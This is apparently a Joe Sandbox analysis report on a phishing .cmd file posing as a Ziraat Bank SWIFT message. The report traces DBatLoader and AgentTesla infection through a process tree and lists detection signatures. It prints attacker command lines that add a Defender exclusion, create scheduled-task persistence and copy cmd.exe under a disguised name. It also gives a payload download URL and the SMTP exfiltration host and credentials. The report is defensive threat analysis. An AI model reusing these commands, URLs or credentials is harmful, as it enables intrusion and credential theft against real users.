Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd

Overview

General Information

Sample name:Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd
Analysis ID:1555251
MD5:20234d2431671991411222678e9620f5
SHA1:88924a49c162ca22ac9ec365a8743cd1647f4501
SHA256:4003e71429b746c43d34c5ef4e793675dad9d60c7cb63d9e0f8c4d70843faadc
Tags:cmduser-lowmal3
Infos:

Detection

AgentTesla, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected DBatLoader
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3136 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 3128 cmdline: extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 348 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 86EE0E8789E9C11F707D056C4052292E)
      • cmd.exe (PID: 6768 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 6392 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 1240 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Wisrysxl.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • lxsyrsiW.pif (PID: 1120 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • neworigin.exe (PID: 6564 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
        • server_BTC.exe (PID: 2820 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • powershell.exe (PID: 5792 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 7188 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 5312 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • TrojanAIbot.exe (PID: 616 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
          • cmd.exe (PID: 1568 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp9170.tmp.cmd"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • timeout.exe (PID: 528 cmdline: timeout 6 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • TrojanAIbot.exe (PID: 2164 cmdline: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7440 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 86EE0E8789E9C11F707D056C4052292E)
    • lxsyrsiW.pif (PID: 7484 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • Wisrysxl.PIF (PID: 7708 cmdline: "C:\Users\Public\Libraries\Wisrysxl.PIF" MD5: 86EE0E8789E9C11F707D056C4052292E)
    • lxsyrsiW.pif (PID: 7756 cmdline: C:\Users\Public\Libraries\lxsyrsiW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • neworigin.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\neworigin.exe" MD5: D6A4CF0966D24C1EA836BA9A899751E5)
      • server_BTC.exe (PID: 7852 cmdline: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • TrojanAIbot.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" MD5: 50D015016F20DA0905FD5B37D7834823)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
{"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    C:\Users\user\AppData\Local\Temp\neworigin.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      C:\Users\user\AppData\Local\Temp\neworigin.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      SourceRuleDescriptionAuthorStrings
      0000000B.00000002.2337075849.00000000029F3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
            0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000B.00000002.2337075849.00000000029C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                Click to see the 14 entries
                SourceRuleDescriptionAuthorStrings
                11.0.neworigin.exe.540000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  11.0.neworigin.exe.540000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    11.0.neworigin.exe.540000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x3587b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x358ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x35977:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x35a09:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x35a73:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x35ae5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x35b7b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x35c0b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    4.2.x.exe.2b10000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

                      System Summary

                      barindex
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 348, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 1120, ProcessName: lxsyrsiW.pif
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5792, ProcessName: powershell.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Wisrysxl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 348, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wisrysxl
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lxsyrsiW.pif, NewProcessName: C:\Users\Public\Libraries\lxsyrsiW.pif, OriginalFileName: C:\Users\Public\Libraries\lxsyrsiW.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 348, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\lxsyrsiW.pif, ProcessId: 1120, ProcessName: lxsyrsiW.pif
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5792, ProcessName: powershell.exe
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ProcessId: 2820, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5312, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\neworigin.exe, Initiated: true, ProcessId: 6564, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49708
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:33 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5312, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\server_BTC.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\server_BTC.exe, ParentProcessId: 2820, ParentProcessName: server_BTC.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 5792, ProcessName: powershell.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-13T16:28:20.241005+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549709TCP
                      2024-11-13T16:28:59.061846+010020229301A Network Trojan was detected20.109.210.53443192.168.2.549908TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-13T16:28:02.656064+010020283713Unknown Traffic192.168.2.549705198.252.105.91443TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeAvira: detection malicious, Label: TR/Spy.Gen8
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeAvira: detection malicious, Label: HEUR/AGEN.1311721
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak/233_Wisrysxlfss"]}
                      Source: 11.0.neworigin.exe.540000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "s82.gocheapweb.com", "Username": "info2@j-fores.com", "Password": "london@1759"}
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFReversingLabs: Detection: 21%
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeReversingLabs: Detection: 65%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 21%
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeReversingLabs: Detection: 65%
                      Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdReversingLabs: Detection: 18%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeJoe Sandbox ML: detected
                      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeJoe Sandbox ML: detected
                      Source: unknownHTTPS traffic detected: 198.252.105.91:443 -> 192.168.2.5:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49791 version: TLS 1.2
                      Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: lxsyrsiW.pif, 0000000A.00000003.2177333908.0000000025FE0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbH source: x.exe, 00000004.00000003.2141221993.000000007E137000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2241429521.000000007F007000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2142185552.000000007FB10000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2141221993.000000007E0B0000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000001790000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000000FE0000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000003.2163239930.0000000021C78000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2061821518.000000007FCC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062442463.00000000028EF000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2163239930.0000000021C4F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2185356044.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2187994808.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.00000000207F3000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220018454.0000000020897000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 00000019.00000001.2295576638.0000000002440000.00000040.00000001.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001D.00000001.2377904124.0000000002440000.00000040.00000001.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000007.00000003.2161406305.0000000004E90000.00000004.00001000.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B15908
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
